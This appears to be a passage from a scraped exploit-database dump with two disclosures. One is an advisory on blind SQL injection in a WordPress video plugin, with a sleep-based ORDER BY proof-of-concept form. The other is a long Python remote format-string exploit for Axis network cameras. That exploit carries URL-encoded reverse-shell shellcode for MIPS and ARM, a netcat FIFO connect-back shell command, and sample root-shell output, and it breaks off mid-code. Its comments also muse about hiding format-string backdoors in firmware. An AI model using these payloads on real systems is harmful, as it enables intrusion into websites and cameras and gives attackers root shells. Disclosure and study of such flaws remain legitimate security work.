1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.\r\n \r\nOVE ID\r\n \r\nOVE-20160712-0004\r\n \r\nTested versions\r\n \r\nThis issue was successfully tested on WordPress Video Player WordPress plugin version 1.5.16.\r\n \r\nFix\r\n \r\nThis issue is resolved in WordPress Video Player 1.5.18.\r\n \r\nIntroduction\r\n \r\nWordPress Video Player is a WordPress video plugin that allows you to easily add videos to your website. WordPress Video Player is affected by multiple blind SQL injection vulnerabilities. Using these issues it is possible for a logged on Contributor (or higher) to extract arbitrary data (eg, the Administrator's password hash) from the WordPress database.\r\n \r\nDetails\r\n \r\nThe vulnerabilities exist in the functions show_tag(), spider_video_select_playlist(), and spider_video_select_video(). The author tried to prevent SQL injection by calling the esc_sql() WordPress function. However, the user input is used in the ORDER BY clause and is consequently not quoted. Due to this it is possible to inject arbitrary SQL statements despite the use of esc_sql()\r\n \r\nshow_tag():\r\n \r\n[...]\r\n \r\nif (isset($_POST['page_number'])) {\r\n if ($_POST['asc_or_desc']) {\r\n $sort[\"sortid_by\"] = esc_sql(esc_html(stripslashes($_POST['order_by'])));\r\n if ($_POST['asc_or_desc'] == 1) {\r\n $sort[\"custom_style\"] = \"manage-column column-title sorted asc\";\r\n $sort[\"1_or_2\"] = \"2\";\r\n $order = \"ORDER BY \" . $sort[\"sortid_by\"] . \" ASC\";\r\n } else {\r\n $sort[\"custom_style\"] = \"manage-column column-title sorted desc\";\r\n $sort[\"1_or_2\"] = \"1\";\r\n $order = \"ORDER BY \" . $sort[\"sortid_by\"] . \" DESC\";\r\n }\r\n }\r\n \r\n \r\nspider_video_select_playlist():\r\n[...]\r\nif(isset($_POST['page_number']))\r\n{\r\n if($_POST['asc_or_desc'])\r\n {\r\n $sort[\"sortid_by\"]=esc_sql(esc_html(stripslashes($_POST['order_by'])));\r\n if($_POST['asc_or_desc']==1)\r\n {\r\n $sort[\"custom_style\"]=\"manage-column column-title sorted asc\";\r\n $sort[\"1_or_2\"]=\"2\";\r\n $order=\"ORDER BY \".$sort[\"sortid_by\"].\" ASC\";\r\n }\r\n else\r\n {\r\n $sort[\"custom_style\"]=\"manage-column column-title sorted desc\";\r\n $sort[\"1_or_2\"]=\"1\";\r\n $order=\"ORDER BY \".$sort[\"sortid_by\"].\" DESC\";\r\n }\r\n }\r\nfunction spider_video_select_video():\r\n \r\n[...]\r\n \r\nif(isset($_POST['page_number']))\r\n{\r\n if($_POST['asc_or_desc'])\r\n {\r\n $sort[\"sortid_by\"]=esc_html(stripslashes($_POST['order_by']));\r\n if($_POST['asc_or_desc']==1)\r\n {\r\n $sort[\"custom_style\"]=\"manage-column column-title sorted asc\";\r\n $sort[\"1_or_2\"]=\"2\";\r\n $order=\"ORDER BY \".esc_sql($sort[\"sortid_by\"]).\" ASC\";\r\n }\r\n else\r\n {\r\n $sort[\"custom_style\"]=\"manage-column column-title sorted desc\";\r\n $sort[\"1_or_2\"]=\"1\";\r\n $order=\"ORDER BY \".esc_sql($sort[\"sortid_by\"]).\" DESC\";\r\n }\r\n }\r\nProof of concept\r\n-->\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://<target>/wp-admin/admin-ajax.php?action=spiderVeideoPlayerselectplaylist\" method=\"POST\">\r\n <input type=\"hidden\" name=\"search_events_by_title\" value=\"\" />\r\n <input type=\"hidden\" name=\"page_number\" value=\"0\" />\r\n <input type=\"hidden\" name=\"serch_or_not\" value=\"\" />\r\n <input type=\"hidden\" name=\"asc_or_desc\" value=\"1\" />\r\n <input type=\"hidden\" name=\"order_by\" value=\"(CASE WHEN (SELECT sleep(10)) = 1 THEN id ELSE title END) ASC #\" />\r\n <input type=\"hidden\" name=\"option\" value=\"com_Spider_Video_Player\" />\r\n <input type=\"hidden\" name=\"task\" value=\"select_playlist\" />\r\n <input type=\"hidden\" name=\"boxchecked\" value=\"0\" />\r\n <input type=\"hidden\" name=\"filter_order_playlist\" value=\"\" />\r\n <input type=\"hidden\" name=\"filter_order_Dir_playlist\" value=\"\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\n\n# 0day.today [2018-03-31] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25181"}, {"lastseen": "2018-03-17T03:12:47", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category remote exploits", "modified": "2016-07-19T00:00:00", "published": "2016-07-19T00:00:00", "id": "1337DAY-ID-25439", "href": "https://0day.today/exploit/description/25439", "type": "zdt", "title": "Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String", "sourceData": "#!/usr/bin/env python2.7\r\n# \r\n# [SOF]\r\n#\r\n# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon\r\n# Research and development by bashis <mcw noemail eu> 2016\r\n#\r\n# This format string vulnerability has following characteristic:\r\n# - Heap Based (Exploiting string located on the heap)\r\n# - Blind Attack (No output the remote attacker)(*)\r\n# - Remotly exploitable (As anonymous, no credentials needed)\r\n#\r\n# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic.\r\n#\r\n# This exploit has following characteristic:\r\n# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]\r\n# - Modifying LHOST/LPORT in shellcode on the fly\r\n# - Manual exploiting of remote targets\r\n# - Simple HTTPS support\r\n# - Basic Authorization support (not needed for this exploit)\r\n# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode\r\n# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)\r\n# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root\r\n# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root)\r\n# - Multiple FMS exploit techniques\r\n# - \"One-Write-Where-And-What\" for MIPS and CRISv32\r\n# Using \"Old Style\" POP's\r\n# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call\r\n# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory.\r\n# - \"Two-Write-Where-And-What\" for ARM\r\n# 1) \"Old Style\": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address\r\n# 2) \"New Style\": ARM Arch's have both \"Old Style\" (>5.50.x) )POPs and \"New Style\" (<5.40.x) direct parameter access for POP/Write\r\n# [Big differnce in possibilities between \"Old Style\" and \"New Style\", pretty interesting actually]\r\n# - Another way to POP with \"Old Style\", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x)\r\n# - Exploit is quite well documented\r\n#\r\n# Anyhow,\r\n# Everything started from this simple remote request:\r\n#\r\n# ---\r\n# $ echo -en \"GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\\n\\n\" | netcat 192.168.0.90 80\r\n# HTTP/1.1 500 Server Error\r\n# Content-Type: text/html; charset=ISO-8859-1\r\n#\r\n# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD>\r\n# <BODY><H1>500 Server Error</H1>\r\n# The server encountered an internal error and could not complete your request.\r\n# </BODY></HTML>\r\n# ---\r\n#\r\n# Which gave this output in /var/log/messages on the remote device:\r\n#\r\n# ---\r\n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10\r\n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data.\r\n# ---\r\n#\r\n# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products\r\n#\r\n# ---\r\n# $ netcat -vvlp 31337\r\n# listening on [any] 31337 ...\r\n# 192.168.0.90: inverse host lookup failed: Unknown host\r\n# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738\r\n# id\r\n# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz)\r\n# pwd\r\n# /usr/html\r\n# ---\r\n#\r\n# Some technical notes:\r\n#\r\n# 1. Direct addressing with %<argument>$%n is \"delayed\", and comes in force only after disconnect.\r\n# Old metod with POP's coming into force instantly\r\n#\r\n# 2. Argument \"0\" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's)\r\n# - Would be interesting to investigate why.\r\n#\r\n# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26\r\n# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff\r\n#\r\n# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff\r\n# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f\r\n#\r\n# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit:\r\n# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!)\r\n#\r\n# 4. Everything is randomized, except heap.\r\n#\r\n# 5. My initial attempts to use ROP's was not good, as I didn't want to create\r\n# one unique FMS key by testing each single firmware version, and using ROP with FMS\r\n# on heap seems pretty complicated as there is one jump availible, maximum two.\r\n#\r\n# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case.\r\n# \r\n# 6. Encoded and Decoded shellcode located in .bss section.\r\n# 6.1 FMS excecuted on heap\r\n#\r\n# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM\r\n# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs,\r\n# so execute shellcode on heap/stack may be impossible.\r\n# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries,\r\n# and re-compile of the image.\r\n# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute.\r\n#\r\n# 8. This exploit are pretty well documented, more details can be extracted by reading\r\n# the code and comments.\r\n#\r\n# MIPS ssid maps\r\n# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid\r\n# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid\r\n# 0041e000-00445000 rwxp 00000000 00:00 0 [heap]\r\n#\r\n# ARM ssid maps\r\n# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid\r\n# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid\r\n# 0001d000-00044000 rw-p 00000000 00:00 0 [heap]\r\n#\r\n# Crisv32 ssid maps\r\n# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid\r\n# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid\r\n# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap]\r\n#\r\n# General notes:\r\n#\r\n# When the vul daemon process is exploited, and after popping root connect-back shell,\r\n# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process,\r\n# when the main process are fully alive again, I can enjoy the shell, and everybody else can\r\n# enjoy of the camera - that should make all of us happy ;)\r\n# During exploiting, logs says almost nothing, only that the main process restarted.\r\n# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits)\r\n#\r\n# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(),\r\n# after ssid cannot verify the user, free() are the closest function to be called after\r\n# vsyslog(), needed and perfect to use for jumping.\r\n# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console.\r\n# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics.\r\n#\r\n# Quite surprised to see so many different devices and under one major release version,\r\n# that's covered by one \"FMS key\". The \"FMS key\" are valid for all minor versions under the major version.\r\n#\r\n# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor, \r\n# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password. \r\n#\r\n# - No hardcoded login/password that could easily be found in firmware/software files. \r\n# - Extremely hard to find without local access (and find out what to trigger for opening the door)\r\n# - Nobody can not actually prove it is a sophisticated door for sure. \"It's just another bug.. sorry! - here is the fixed version.\"\r\n# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find)\r\n#\r\n# Note:\r\n# I don't say that Axis Communication has made this hidden format string by this purpose.\r\n# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon, \r\n# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr().\r\n#\r\n# Vulnerable and exploitable products\r\n#\r\n# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006,\r\n# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364,\r\n# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215,\r\n# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384,\r\n# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624,\r\n# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E,\r\n# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT,\r\n# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045,\r\n# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E,\r\n# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203,\r\n# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E,\r\n# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E,\r\n# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C,\r\n# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W,\r\n# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L,\r\n# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more\r\n#\r\n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt\r\n#\r\n# Firmware versions vulnerable to the SSI FMS exploit\r\n#\r\n# ('V.Vx' == The FMS key used in this exploit)\r\n#\r\n# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x)\r\n# 5.00.x 2008 - - no\r\n# 5.01.x 2008 no - no\r\n# 5.02.x 2008 no - -\r\n# 5.05.x 2009 no - -\r\n# 5.06.x 2009 no - -\r\n# 5.07.x 2009 no - no\r\n# 5.08.x 2010 no - -\r\n# 5.09.x 2010 no - -\r\n# 5.10.x 2009 no - -\r\n# 5.11.x 2010 no - -\r\n# 5.12.x 2010 no - -\r\n# 5.15.x 2010 no - -\r\n# 5.16.x 2010 no - -\r\n# 5.20.x 2010-2011 5.2x - 5.2x\r\n# 5.21.x 2011 5.2x - 5.2x\r\n# 5.22.x 2011 5.2x - -\r\n# 5.25.x 2011 5.2x - -\r\n# 5.40.x 2011 5.4x 5.4x 5.4x\r\n# 5.41.x 2012 5.4x - -\r\n# 5.50.x 2013 5.5x 5.5x 5.4x\r\n# 5.51.x 2013 - 5.4x -\r\n# 5.55.x 2013 - 5.5x 5.5x\r\n# 5.60.x 2014 - 5.6x 5.6x\r\n# 5.65.x 2014-2015 - 5.6x -\r\n# 5.70.x 2015 - 5.7x -\r\n# 5.75.x 2015 - 5.7x 5.7x\r\n# 5.80.x 2015 - 5.8x 5.8x\r\n# 5.81.x 2015 - 5.8x -\r\n# 5.85.x 2015 - 5.8x 5.8x\r\n# 5.90.x 2015 - 5.9x -\r\n# 5.95.x 2016 - 5.9x 5.8x\r\n# 6.10.x 2016 - 6.1x -\r\n# 6.15.x 2016 - - 6.1x\r\n# 6.20.x 2016 - 6.2x -\r\n#\r\n# Vendor URL's of still supported and affected products\r\n#\r\n# http://www.axis.com/global/en/products/access-control\r\n# http://www.axis.com/global/en/products/video-encoders\r\n# http://www.axis.com/global/en/products/network-cameras\r\n# http://www.axis.com/global/en/products/audio\r\n#\r\n# Axis Product Security\r\n#\r\n# [email\u00a0protected]\r\n# http://www.axis.com/global/en/support/product-security\r\n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt\r\n# http://www.axis.com/global/en/support/faq/FAQ116268\r\n#\r\n# Timetable\r\n#\r\n# - Research and Development: 06/01/2016 - 01/06/2016\r\n# - Sent vulnerability details to vendor: 05/06/2016\r\n# - Vendor responce received: 06/06/2016\r\n# - Vendor ACK of findings received: 07/06/2016\r\n# - Vendor sent verification image: 13/06/2016\r\n# - Confirmed that exploit do not work after vendors correction: 13/06/2016\r\n# - Vendor informed about their service release(s): 29/06/2016\r\n# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016\r\n# - Full Disclosure: 18/07/2016\r\n#\r\n# Quote of the day: Never say \"whoops! :o\", always say \"Ah, still interesting! :>\"\r\n#\r\n# Have a nice day\r\n# /bashis\r\n#\r\n#####################################################################################\r\n \r\nimport sys\r\nimport string\r\nimport socket\r\nimport time\r\nimport argparse\r\nimport urllib, urllib2, httplib\r\nimport base64\r\nimport ssl\r\nimport re\r\n \r\n \r\nclass do_FMS:\r\n \r\n# POP = \"%8x\" # Old style POP's with 8 bytes per POP\r\n POP = \"%1c\" # Old style POP's with 1 byte per POP\r\n WRITElln = \"%lln\" # Write 8 bytes\r\n WRITEn = \"%n\" # Write 4 bytes\r\n WRITEhn = \"%hn\" # Write 2 bytes\r\n WRITEhhn = \"%hhn\" # Write 1 byte\r\n \r\n def __init__(self,targetIP,verbose):\r\n self.targetIP = targetIP\r\n self.verbose = verbose\r\n self.fmscode = \"\"\r\n \r\n # Mostly used internally in this function\r\n def Add(self, data):\r\n self.fmscode += data\r\n \r\n # 'New Style' Double word (8 bytes)\r\n def AddDirectParameterLLN(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('$lln')\r\n \r\n # 'New Style' Word (4 bytes)\r\n def AddDirectParameterN(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('$n')\r\n \r\n # 'New Style' Half word (2 bytes)\r\n def AddDirectParameterHN(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('$hn')\r\n \r\n # 'New Style' One Byte (1 byte)\r\n def AddDirectParameterHHN(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('$hhn')\r\n \r\n # Addressing\r\n def AddADDR(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('u')\r\n \r\n # 'Old Style' POP\r\n def AddPOP(self, size):\r\n if size != 0:\r\n self.Add(self.POP * size)\r\n \r\n # Normally only one will be sent, multiple is good to quick-check for any FMS\r\n #\r\n # 'Old Style' Double word (8 bytes)\r\n def AddWRITElln(self, size):\r\n self.Add(self.WRITElln * size)\r\n \r\n # 'Old Style' Word (4 bytes)\r\n def AddWRITEn(self, size):\r\n self.Add(self.WRITEn * size)\r\n \r\n # 'Old Style' Half word (2 bytes)\r\n def AddWRITEhn(self, size):\r\n self.Add(self.WRITEhn * size)\r\n \r\n # 'Old Style' One byte (1 byte)\r\n def AddWRITEhhn(self, size):\r\n self.Add(self.WRITEhhn * size)\r\n \r\n # Return the whole FMS string\r\n def FMSbuild(self):\r\n return self.fmscode\r\n \r\nclass HTTPconnect:\r\n \r\n def __init__(self, host, proto, verbose, creds, noexploit):\r\n self.host = host\r\n self.proto = proto\r\n self.verbose = verbose\r\n self.credentials = creds\r\n self.noexploit = noexploit\r\n \r\n # Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\\t','$','`' etc..\r\n def RAW(self, uri):\r\n # Connect-timeout in seconds\r\n timeout = 5\r\n socket.setdefaulttimeout(timeout)\r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n tmp = self.host.split(':')\r\n HOST = tmp[0]\r\n PORT = int(tmp[1])\r\n if self.verbose:\r\n print \"[Verbose] Sending to:\", HOST\r\n print \"[Verbose] Port:\", PORT\r\n print \"[Verbose] URI:\",uri\r\n s.connect((HOST, PORT))\r\n s.send(\"GET %s HTTP/1.0\\r\\n\\r\\n\" % uri)\r\n html = (s.recv(4096)) # We really do not care whats coming back\r\n# if html:\r\n# print \"[i] Received:\",html\r\n s.shutdown(3)\r\n s.close()\r\n return html\r\n \r\n \r\n def Send(self, uri):\r\n \r\n # The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually\r\n # matter for the functionality of this exploit, only for future references.\r\n headers = { \r\n 'User-Agent' : 'MSIE',\r\n }\r\n \r\n # Connect-timeout in seconds\r\n timeout = 5\r\n socket.setdefaulttimeout(timeout)\r\n \r\n url = '%s://%s%s' % (self.proto, self.host, uri)\r\n \r\n if self.verbose:\r\n print \"[Verbose] Sending:\", url\r\n \r\n if self.proto == 'https':\r\n if hasattr(ssl, '_create_unverified_context'):\r\n print \"[i] Creating SSL Default Context\"\r\n ssl._create_default_https_context = ssl._create_unverified_context\r\n \r\n if self.credentials:\r\n Basic_Auth = self.credentials.split(':')\r\n if self.verbose:\r\n print \"[Verbose] User:\",Basic_Auth[0],\"Password:\",Basic_Auth[1]\r\n try:\r\n pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()\r\n pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])\r\n auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)\r\n opener = urllib2.build_opener(auth_handler)\r\n urllib2.install_opener(opener)\r\n except Exception as e:\r\n print \"[!] Basic Auth Error:\",e\r\n sys.exit(1)\r\n \r\n if self.noexploit and not self.verbose:\r\n print \"[<] 204 Not Sending!\"\r\n html = \"Not sending any data\"\r\n else:\r\n data = None\r\n req = urllib2.Request(url, data, headers)\r\n rsp = urllib2.urlopen(req)\r\n if rsp:\r\n print \"[<] %s OK\" % rsp.code\r\n html = rsp.read()\r\n return html\r\n \r\n \r\nclass shellcode_db:\r\n \r\n def __init__(self,targetIP,verbose):\r\n self.targetIP = targetIP\r\n self.verbose = verbose\r\n \r\n def sc(self,target):\r\n self.target = target\r\n \r\n \r\n# Connect back shellcode\r\n#\r\n# CRISv32: Written by myself, no shellcode availible out on \"The Internet\"\r\n# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators\r\n# MIPSel: Written by Jacob Holcomb (url encoded by me)\r\n# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php\r\n#\r\n # Slightly modified syscall's\r\n MIPSel = string.join([\r\n #close stdin\r\n \"%ff%ff%04%28\" #slti a0,zero,-1\r\n \"%a6%0f%02%24\" #li v0,4006\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #close stdout\r\n \"%11%11%04%28\" #slti a0,zero,4369\r\n \"%a6%0f%02%24\" #li v0,4006\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #close stderr\r\n \"%fd%ff%0c%24\" #li t4,-3\r\n \"%27%20%80%01\" #nor a0,t4,zero\r\n \"%a6%0f%02%24\" #li v0,4006\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n # socket AF_INET (2)\r\n \"%fd%ff%0c%24\" #li t4,-3\r\n \"%27%20%80%01\" #nor a0,t4,zero\r\n \"%27%28%80%01\" #nor a1,t4,zero\r\n \"%ff%ff%06%28\" #slti a2,zero,-1\r\n \"%57%10%02%24\" #li v0,4183\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #\r\n \"%ff%ff%44%30\" # andi $a0, $v0, 0xFFFF\r\n #\r\n # dup2 stdout\r\n \"%c9%0f%02%24\" #li v0,4041\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #\r\n # dup2 stderr\r\n \"%c9%0f%02%24\" #li v0,4041\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #\r\n # Port\r\n \"PP1PP0%05%3c\"\r\n \"%01%ff%a5%34\"\r\n #\r\n \"%01%01%a5%20\" #addi a1,a1,257\r\n \"%f8%ff%a5%af\" #sw a1,-8(sp)\r\n #\r\n # IP\r\n \"IP3IP4%05%3c\"\r\n \"IP1IP2%a5%34\"\r\n #\r\n \"%fc%ff%a5%af\" #sw a1,-4(sp)\r\n \"%f8%ff%a5%23\" #addi a1,sp,-8\r\n \"%ef%ff%0c%24\" #li t4,-17\r\n \"%27%30%80%01\" #nor a2,t4,zero\r\n \"%4a%10%02%24\" #li v0,4170\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #\r\n \"%62%69%08%3c\" #lui t0,0x6962\r\n \"%2f%2f%08%35\" #ori t0,t0,0x2f2f\r\n \"%ec%ff%a8%af\" #sw t0,-20(sp)\r\n \"%73%68%08%3c\" #lui t0,0x6873\r\n \"%6e%2f%08%35\" #ori t0,t0,0x2f6e\r\n \"%f0%ff%a8%af\" #sw t0,-16(sp\r\n \"%ff%ff%07%28\" #slti a3,zero,-1\r\n \"%f4%ff%a7%af\" #sw a3,-12(sp)\r\n \"%fc%ff%a7%af\" #sw a3,-4(sp\r\n \"%ec%ff%a4%23\" #addi a0,sp,-20\r\n \"%ec%ff%a8%23\" #addi t0,sp,-20\r\n \"%f8%ff%a8%af\" #sw t0,-8(sp)\r\n \"%f8%ff%a5%23\" #addi a1,sp,-8\r\n \"%ec%ff%bd%27\" #addiu sp,sp,-20\r\n \"%ff%ff%06%28\" #slti a2,zero,-1\r\n \"%ab%0f%02%24\" #li v0,4011 (execve)\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n ], '') \r\n \r\n # Working netcat shell\r\n # - $PATH will locate 'mkfifo', 'nc' and 'rm'\r\n # - LHOST / LPORT will be changed on the fly later in the code\r\n # - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting\r\n # - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator]\r\n # $ echo -n \"$IFS\" | hexdump -C\r\n # 00000000 20 09 0a\r\n # - $PS1 = $ [By default, and we need something to \"comment\" out our trailing FMS code from /bin/sh -c]\r\n #\r\n # '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator\r\n #\r\n # Working with Apache and Boa\r\n# NCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s\\\"$IFS\\\"2>/tmp/s;rm$IFS/tmp/s;$PS1\"\r\n NCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1\"\r\n \r\n ARMel = string.join([\r\n # original: http://shell-storm.org/shellcode/files/shellcode-754.php\r\n # 32-bit instructions, enter thumb mode\r\n \"%01%10%8f%e2\" # add r1, pc, #1\r\n \"%11%ff%2f%e1\" # bx r1\r\n \r\n # 16-bit thumb instructions follow\r\n #\r\n # socket(2, 1, 0)\r\n \"%02%20\" #mov r0, #2\r\n \"%01%21\" #mov r1, #1\r\n \"%92%1a\" #sub r2, r2, r2\r\n \"%0f%02\" #lsl r7, r1, #8\r\n \"%19%37\" #add r7, r7, #25\r\n \"%01%df\" #svc 1\r\n #\r\n # connect(r0, &addr, 16)\r\n \"%06%1c\" #mov r6, r0\r\n \"%08%a1\" #add r1, pc, #32\r\n \"%10%22\" #mov r2, #16\r\n \"%02%37\" #add r7, #2\r\n \"%01%df\" #svc 1\r\n #\r\n # dup2(r0, 0/1/2)\r\n \"%3f%27\" #mov r7, #63\r\n \"%02%21\" #mov r1, #2\r\n #\r\n #lb:\r\n \"%30%1c\" #mov r0, r6\r\n \"%01%df\" #svc 1\r\n \"%01%39\" #sub r1, #1\r\n \"%fb%d5\" #bpl lb\r\n #\r\n # execve(\"/bin/sh\", [\"/bin/sh\", 0], 0)\r\n \"%05%a0\" #add r0, pc, #20\r\n \"%92%1a\" #sub r2, r2, r2\r\n \"%05%b4\" #push {r0, r2}\r\n \"%69%46\" #mov r1, sp\r\n \"%0b%27\" #mov r7, #11\r\n \"%01%df\" #svc 1\r\n #\r\n \"%c0%46\" # .align 2 (NOP)\r\n \"%02%00\" # .short 0x2 (struct sockaddr)\r\n \"PP1PP0\" # .short 0x3412 (port: 0x1234)\r\n \"IP1IP2IP3IP4\" #.byte 192,168,57,1 (ip: 192.168.57.1)\r\n # .ascii \"/bin/sh\\0\\0\"\r\n \"%2f%62%69%6e\" # /bin\r\n \"%2f%73%68%00%00\" # /sh\\x00\\x00\r\n \"%00%00%00%00\"\r\n \"%c0%46\"\r\n ], '') \r\n \r\n \r\n # Connect-back shell for Axis CRISv32\r\n # Written by mcw noemail eu 2016\r\n #\r\n 